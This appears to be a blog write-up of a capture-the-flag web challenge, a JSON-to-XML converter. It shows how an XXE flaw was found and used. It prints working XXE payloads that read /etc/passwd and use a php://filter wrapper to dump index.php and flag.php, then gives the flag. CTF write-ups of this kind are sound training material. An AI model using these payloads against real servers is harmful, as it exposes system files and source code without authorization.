Link: http://j2x2j.chal.ctf.westerns.tokyo/
At the gance, I saw this word : "JSON <-> XML Converter" in the title. Obviously, I would immediately think of XXE.
Back to the site's interface, there are 2 boxes, a json format box, and an xml format box. By using the following payload, we can determine if it is really a XXE vulnerability or not.
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>
Put this payload and boom!
Later, I found that the site was written by PHP, and in may poison repository, there were weapons available to solve this problem :) I used PHP wrapper inside XXE
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> <contacts> <contact> <name>lnlinh31 &xxe; </name> </contact> </contacts>
Looking at the first line of index.php, you know what to do?
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.php"> ]> <contacts> <contact> <name>lnlinh31 &xxe; </name> </contact> </contacts>
Flag: TWCTF{t1ny_XXE_st1ll_ex1sts_everywhere}
Hope this article makes you satisfied, thanks for watching :)
What leads you to use php://filter/... ? From where can I learn this? How is that called?
Trả lờiXóa